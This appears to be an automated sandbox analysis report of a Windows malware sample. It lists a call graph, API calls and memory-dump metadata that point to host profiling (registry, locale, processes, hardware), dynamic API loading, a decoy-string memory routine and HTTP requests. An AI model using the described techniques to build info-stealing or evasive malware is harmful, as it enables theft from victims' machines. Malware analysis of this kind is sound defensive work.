d40a2d 14983->14986 14987 d409ab 14983->14987 14988 d4a9b0 4 API calls 14984->14988 14989 d4a7a0 lstrcpy 14985->14989 14986->13396 14990 d31590 lstrcpy 14987->14990 14991 d408ac 14988->14991 14993 d4083e 14989->14993 14994 d409f4 14990->14994 14992 d4a920 3 API calls 14991->14992 14995 d408b3 14992->14995 15688 d3fb00 14993->15688 14997 d4a7a0 lstrcpy 14994->14997 14999 d4a9b0 4 API calls 14995->14999 14998 d40a0d 14997->14998 15001 d4a7a0 lstrcpy 14998->15001 15002 d408ba 14999->15002 15000->14975 15003 d40a28 15001->15003 15004 d4a8a0 lstrcpy 15002->15004 15804 d40030 15003->15804 15016->14983 15336 d4a7a0 lstrcpy 15335->15336 15337 d31683 15336->15337 15338 d4a7a0 lstrcpy 15337->15338 15339 d31695 15338->15339 15340 d4a7a0 lstrcpy 15339->15340 15341 d316a7 15340->15341 15342 d4a7a0 lstrcpy 15341->15342 15343 d315a3 15342->15343 15343->14219 15345 d347c6 15344->15345 15346 d34838 lstrlen 15345->15346 15370 d4aad0 15346->15370 15348 d34848 InternetCrackUrlA 15349 d34867 15348->15349 15349->14296 15351 d4a740 lstrcpy 15350->15351 15352 d48b74 15351->15352 15353 d4a740 lstrcpy 15352->15353 15354 d48b82 GetSystemTime 15353->15354 15356 d48b99 15354->15356 15355 d4a7a0 lstrcpy 15357 d48bfc 15355->15357 15356->15355 15357->14311 15360 d4a931 15358->15360 15359 d4a988 15361 d4a7a0 lstrcpy 15359->15361 15360->15359 15362 d4a968 lstrcpy lstrcat 15360->15362 15363 d4a994 15361->15363 15362->15359 15363->14314 15364->14429 15366 d34eee 15365->15366 15367 d39af9 LocalAlloc 15365->15367 15366->14317 15366->14319 15367->15366 15368 d39b14 CryptStringToBinaryA 15367->15368 15368->15366 15369 d39b39 LocalFree 15368->15369 15369->15366 15370->15348 15371->14439 15372->14580 15373->14582 15374->14590 15503 d477a0 15375->15503 15378 d476c6 RegOpenKeyExA 15380 d47704 RegCloseKey 15378->15380 15381 d476e7 RegQueryValueExA 15378->15381 15379 d41c1e 15379->14672 15380->15379 15381->15380 15383 d41c99 15382->15383 15383->14686 15385 d41e09 15384->15385 15385->14728 15387 d41e84 15386->15387 15388 d47a9a wsprintfA 15386->15388 15387->14742 15388->15387 15390 d41efe 15389->15390 15391 d47b4d 15389->15391 15390->14756 15510 d48d20 LocalAlloc CharToOemW 15391->15510 15394 d4a740 lstrcpy 15393->15394 15395 d47bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15394->15395 15404 d47c25 15395->15404 15396 d47c46 GetLocaleInfoA 15396->15404 15397 d47d18 15398 d47d1e LocalFree 15397->15398 15399 d47d28 15397->15399 15398->15399 15401 d4a7a0 lstrcpy 15399->15401 15400 d4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15400->15404 15402 d47d37 15401->15402 15402->14769 15403 d4a8a0 lstrcpy 15403->15404 15404->15396 15404->15397 15404->15400 15404->15403 15406 d42008 15405->15406 15406->14784 15408 d494b5 15407->15408 15409 d49493 GetModuleFileNameExA CloseHandle 15407->15409 15410 d4a740 lstrcpy 15408->15410 15409->15408 15411 d42091 15410->15411 15411->14799 15413 d42119 15412->15413 15414 d47e68 RegQueryValueExA 15412->15414 15413->14813 15415 d47e8e RegCloseKey 15414->15415 15415->15413 15417 d47fb9 GetLogicalProcessorInformationEx 15416->15417 15418 d47fd8 GetLastError 15417->15418 15419 d48029 15417->15419 15423 d48022 15418->15423 15428 d47fe3 15418->15428 15424 d489f0 2 API calls 15419->15424 15422 d42194 15422->14827 15423->15422 15425 d489f0 2 API calls 15423->15425 15426 d4807b 15424->15426 15425->15422 15426->15423 15427 d48084 wsprintfA 15426->15427 15427->15422 15428->15417 15428->15422 15511 d489f0 15428->15511 15514 d48a10 GetProcessHeap RtlAllocateHeap 15428->15514 15430 d4220f 15429->15430 15430->14841 15432 d489b0 15431->15432 15433 d4814d GlobalMemoryStatusEx 15432->15433 15434 d48163 __aulldiv 15433->15434 15435 d4819b wsprintfA 15434->15435 15436 d42289 15435->15436 15436->14855 15438 d487fb GetProcessHeap RtlAllocateHeap wsprintfA 15437->15438 15440 d4a740 lstrcpy 15438->15440 15441 d4230b 15440->15441 15441->14869 15443 d4a740 lstrcpy 15442->15443 15449 d48229 15443->15449 15444 d48263 15446 d4a7a0 lstrcpy 15444->15446 15445 d4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15445->15449 15447 d482dc 15446->15447 15447->14886 15448 d4a8a0 lstrcpy 15448->15449 15449->15444 15449->15445 15449->15448 15451 d4a740 lstrcpy 15450->15451 15452 d4835c RegOpenKeyExA 15451->15452 15453 d483d0 15452->15453 15454 d483ae 15452->15454 15456 d48613 RegCloseKey 15453->15456 15457 d483f8 RegEnumKeyExA 15453->15457 15455 d4a7a0 lstrcpy 15454->15455 15466 d483bd 15455->15466 15458 d4a7a0 lstrcpy 15456->15458 15459 d4860e 15457->15459 15460 d4843f wsprintfA RegOpenKeyExA 15457->15460 15458->15466 15459->15456 15461 d48485 RegCloseKey RegCloseKey 15460->15461 15462 d484c1 RegQueryValueExA 15460->15462 15465 d4a7a0 lstrcpy 15461->15465 15463 d48601 RegCloseKey 15462->15463 15464 d484fa lstrlen 15462->15464 15463->15459 15464->15463 15467 d48510 15464->15467 15465->15466 15466->14912 15468 d4a9b0 4 API calls 15467->15468 15469 d48527 15468->15469 15470 d4a8a0 lstrcpy 15469->15470 15471 d48533 15470->15471 15472 d4a9b0 4 API calls 15471->15472 15473 d48557 15472->15473 15474 d4a8a0 lstrcpy 15473->15474 15475 d48563 15474->15475 15476 d4856e RegQueryValueExA 15475->15476 15476->15463 15477 d485a3 15476->15477 15478 d4a9b0 4 API calls 15477->15478 15479 d485ba 15478->15479 15480 d4a8a0 lstrcpy 15479->15480 15481 d485c6 15480->15481 15482 d4a9b0 4 API calls 15481->15482 15483 d485ea 15482->15483 15484 d4a8a0 lstrcpy 15483->15484 15485 d485f6 15484->15485 15485->15463 15487 d4a740 lstrcpy 15486->15487 15488 d486bc CreateToolhelp32Snapshot Process32First 15487->15488 15489 d4875d CloseHandle 15488->15489 15490 d486e8 Process32Next 15488->15490 15491 d4a7a0 lstrcpy 15489->15491 15490->15489 15495 d486fd 15490->15495 15494 d48776 15491->15494 15492 d4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15492->15495 15493 d4a8a0 lstrcpy 15493->15495 15494->14944 15495->15490 15495->15492 15495->15493 15497 d4a7a0 lstrcpy 15496->15497 15498 d451b5 15497->15498 15499 d31590 lstrcpy 15498->15499 15500 d451c6 15499->15500 15515 d35100 15500->15515 15502 d451cf 15502->14956 15506 d47720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15503->15506 15505 d476b9 15505->15378 15505->15379 15507 d47765 RegQueryValueExA 15506->15507 15508 d47780 RegCloseKey 15506->15508 15507->15508 15509 d47793 15508->15509 15509->15505 15510->15390 15512 d48a0c 15511->15512 15513 d489f9 GetProcessHeap HeapFree 15511->15513 15512->15428 15513->15512 15514->15428 15516 d4a7a0 lstrcpy 15515->15516 15517 d35119 15516->15517 15518 d347b0 2 API calls 15517->15518 15519 d35125 15518->15519 15675 d48ea0 15519->15675 15521 d35184 15522 d35192 lstrlen 15521->15522 15523 d351a5 15522->15523 15524 d48ea0 4 API calls 15523->15524 15525 d351b6 15524->15525 15526 d4a740 lstrcpy 15525->15526 15527 d351c9 15526->15527 15528 d4a740 lstrcpy 15527->15528 15529 d351d6 15528->15529 15530 d4a740 lstrcpy 15529->15530 15531 d351e3 15530->15531 15532 d4a740 lstrcpy 15531->15532 15533 d351f0 15532->15533 15534 d4a740 lstrcpy 15533->15534 15535 d351fd InternetOpenA StrCmpCA 15534->15535 15536 d3522f 15535->15536 15537 d358c4 InternetCloseHandle 15536->15537 15538 d48b60 3 API calls 15536->15538 15546 d358d9 ctype 15537->15546 15539 d3524e 15538->15539 15540 d4a920 3 API calls 15539->15540 15541 d35261 15540->15541 15542 d4a8a0 lstrcpy 15541->15542 15543 d3526a 15542->15543 15544 d4a9b0 4 API calls 15543->15544 15545 d352ab 15544->15545 15547 d4a920 3 API calls 15545->15547 15548 d4a7a0 lstrcpy 15546->15548 15549 d352b2 15547->15549 15556 d35913 15548->15556 15550 d4a9b0 4 API calls 15549->15550 15551 d352b9 15550->15551 15552 d4a8a0 lstrcpy 15551->15552 15553 d352c2 15552->15553 15554 d4a9b0 4 API calls 15553->15554 15555 d35303 15554->15555 15557 d4a920 3 API calls 15555->15557 15556->15502 15558 d3530a 15557->15558 15559 d4a8a0 lstrcpy 15558->15559 15560 d35313 15559->15560 15561 d35329 InternetConnectA 15560->15561 15561->15537 15562 d35359 HttpOpenRequestA 15561->15562 15564 d358b7 InternetCloseHandle 15562->15564 15565 d353b7 15562->15565 15564->15537 15566 d4a9b0 4 API calls 15565->15566 15567 d353cb 15566->15567 15568 d4a8a0 lstrcpy 15567->15568 15569 d353d4 15568->15569 15570 d4a920 3 API calls 15569->15570 15571 d353f2 15570->15571 15572 d4a8a0 lstrcpy 15571->15572 15573 d353fb 15572->15573 15574 d4a9b0 4 API calls 15573->15574 15575 d3541a 15574->15575 15576 d4a8a0 lstrcpy 15575->15576 15577 d35423 15576->15577 15578 d4a9b0 4 API calls 15577->15578 15579 d35444 15578->15579 15580 d4a8a0 lstrcpy 15579->15580 15581 d3544d 15580->15581 15582 d4a9b0 4 API calls 15581->15582 15583 d3546e 15582->15583 15584 d4a8a0 lstrcpy 15583->15584 15585 d35477 15584->15585 15676 d48ead CryptBinaryToStringA 15675->15676 15677 d48ea9 15675->15677 15676->15677 15678 d48ece GetProcessHeap RtlAllocateHeap 15676->15678 15677->15521 15678->15677 15679 d48ef4 ctype 15678->15679 15680 d48f05 CryptBinaryToStringA 15679->15680 15680->15677 15684->14959 15927 d39880 15685->15927 15687 d398e1 15687->14966 15689 d4a740 lstrcpy 15688->15689 15690 d3fb16 15689->15690 15862 d4a740 lstrcpy 15861->15862 15863 d40266 15862->15863 15864 d48de0 2 API calls 15863->15864 15865 d4027b 15864->15865 15866 d4a920 3 API calls 15865->15866 15867 d4028b 15866->15867 15868 d4a8a0 lstrcpy 15867->15868 15869 d40294 15868->15869 15870 d4a9b0 4 API calls 15869->15870 15871 d402b8 15870->15871 15928 d3988d 15927->15928 15931 d36fb0 15928->15931 15930 d398ad ctype 15930->15687 15934 d36d40 15931->15934 15935 d36d63 15934->15935 15946 d36d59 15934->15946 15935->15946 15948 d36660 15935->15948 15937 d36dbe 15937->15946 15954 d369b0 15937->15954 15939 d36e2a 15940 d36ee6 VirtualFree 15939->15940 15942 d36ef7 15939->15942 15939->15946 15940->15942 15941 d36f41 15945 d489f0 2 API calls 15941->15945 15941->15946 15942->15941 15943 d36f26 FreeLibrary 15942->15943 15944 d36f38 15942->15944 15943->15942 15947 d489f0 2 API calls 15944->15947 15945->15946 15946->15930 15947->15941 15951 d3668f VirtualAlloc 15948->15951 15950 d36730 15952 d36743 VirtualAlloc 15950->15952 15953 d3673c 15950->15953 15951->15950 15951->15953 15952->15953 15953->15937 15955 d369c9 15954->15955 15959 d369d5 15954->15959 15956 d36a09 LoadLibraryA 15955->15956 15955->15959 15957 d36a32 15956->15957 15956->15959 15961 d36ae0 15957->15961 15964 d48a10 GetProcessHeap RtlAllocateHeap 15957->15964 15959->15939 15960 d36ba8 GetProcAddress 15960->15959 15960->15961 15961->15959 15961->15960 15962 d489f0 2 API calls 15962->15961 15963 d36a8b 15963->15959 15963->15962 15964->15963

                  Executed Functions

                  Function 00D49860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 d49860-d49874 call d49750 663 d49a93-d49af2 LoadLibraryA * 5 660->663 664 d4987a-d49a8e call d49780 GetProcAddress * 21 660->664 666 d49af4-d49b08 GetProcAddress 663->666 667 d49b0d-d49b14 663->667 664->663 666->667 669 d49b46-d49b4d 667->669 670 d49b16-d49b41 GetProcAddress * 2 667->670 671 d49b4f-d49b63 GetProcAddress 669->671 672 d49b68-d49b6f 669->672 670->669 671->672 673 d49b71-d49b84 GetProcAddress 672->673 674 d49b89-d49b90 672->674 673->674 675 d49bc1-d49bc2 674->675 676 d49b92-d49bbc GetProcAddress * 2 674->676 676->675
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,00AF2380), ref: 00D498A1
                  • GetProcAddress.KERNEL32(74DD0000,00AF2260), ref: 00D498BA
                  • GetProcAddress.KERNEL32(74DD0000,00AF2308), ref: 00D498D2
                  • GetProcAddress.KERNEL32(74DD0000,00AF22C0), ref: 00D498EA
                  • GetProcAddress.KERNEL32(74DD0000,00AF2218), ref: 00D49903
                  • GetProcAddress.KERNEL32(74DD0000,00AF8F98), ref: 00D4991B
                  • GetProcAddress.KERNEL32(74DD0000,00AE5AF0), ref: 00D49933
                  • GetProcAddress.KERNEL32(74DD0000,00AE5C90), ref: 00D4994C
                  • GetProcAddress.KERNEL32(74DD0000,00AF23B0), ref: 00D49964
                  • GetProcAddress.KERNEL32(74DD0000,00AF2470), ref: 00D4997C
                  • GetProcAddress.KERNEL32(74DD0000,00AF2440), ref: 00D49995
                  • GetProcAddress.KERNEL32(74DD0000,00AF2458), ref: 00D499AD
                  • GetProcAddress.KERNEL32(74DD0000,00AE5D70), ref: 00D499C5
                  • GetProcAddress.KERNEL32(74DD0000,00AF24A0), ref: 00D499DE
                  • GetProcAddress.KERNEL32(74DD0000,00AF2278), ref: 00D499F6
                  • GetProcAddress.KERNEL32(74DD0000,00AE5CB0), ref: 00D49A0E
                  • GetProcAddress.KERNEL32(74DD0000,00AF24B8), ref: 00D49A27
                  • GetProcAddress.KERNEL32(74DD0000,00AF2320), ref: 00D49A3F
                  • GetProcAddress.KERNEL32(74DD0000,00AE5E50), ref: 00D49A57
                  • GetProcAddress.KERNEL32(74DD0000,00AF2230), ref: 00D49A70
                  • GetProcAddress.KERNEL32(74DD0000,00AE5B90), ref: 00D49A88
                  • LoadLibraryA.KERNEL32(00AF2590,?,00D46A00), ref: 00D49A9A
                  • LoadLibraryA.KERNEL32(00AF2578,?,00D46A00), ref: 00D49AAB
                  • LoadLibraryA.KERNEL32(00AF25A8,?,00D46A00), ref: 00D49ABD
                  • LoadLibraryA.KERNEL32(00AF25C0,?,00D46A00), ref: 00D49ACF
                  • LoadLibraryA.KERNEL32(00AF25D8,?,00D46A00), ref: 00D49AE0
                  • GetProcAddress.KERNEL32(75A70000,00AF2518), ref: 00D49B02
                  • GetProcAddress.KERNEL32(75290000,00AF2530), ref: 00D49B23
                  • GetProcAddress.KERNEL32(75290000,00AF2548), ref: 00D49B3B
                  • GetProcAddress.KERNEL32(75BD0000,00AF2560), ref: 00D49B5D
                  • GetProcAddress.KERNEL32(75450000,00AE5DF0), ref: 00D49B7E
                  • GetProcAddress.KERNEL32(76E90000,00AF8F58), ref: 00D49B9F
                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D49BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00D49BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 9732b54038fcc10b284c362daef6d28e8bd04c267c04b5789f6f3004dd46c566
                  • Instruction ID: e5cc3c57073bc171a6ccc2a1b5f938952a685cd7eae74e5342efb8dc1d25a0eb
                  • Opcode Fuzzy Hash: 9732b54038fcc10b284c362daef6d28e8bd04c267c04b5789f6f3004dd46c566
                  • Instruction Fuzzy Hash: 5EA13BB55042489FD348EFA8ED89D6E3BF9F7CC301706451AA61DC3264D63998C2EB63
                  Function 00D345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 d345c0-d34695 RtlAllocateHeap 781 d346a0-d346a6 764->781 782 d3474f-d347a9 VirtualProtect 781->782 783 d346ac-d3474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D3460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D3479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3462D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 2f62e14e2460472d405baa3769d698b59a63486846334b521f3994730538a532
                  • Instruction ID: 37647dea899d464ab2bd535233e5538f23e398e09cdf1620e953023320423e78
                  • Opcode Fuzzy Hash: 2f62e14e2460472d405baa3769d698b59a63486846334b521f3994730538a532
                  • Instruction Fuzzy Hash: 1D4106606C2684EEEF35B7A4BC5EE9D7651DF8A70AF905060EC4052E9CCF60758D4732
                  Function 00D34880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
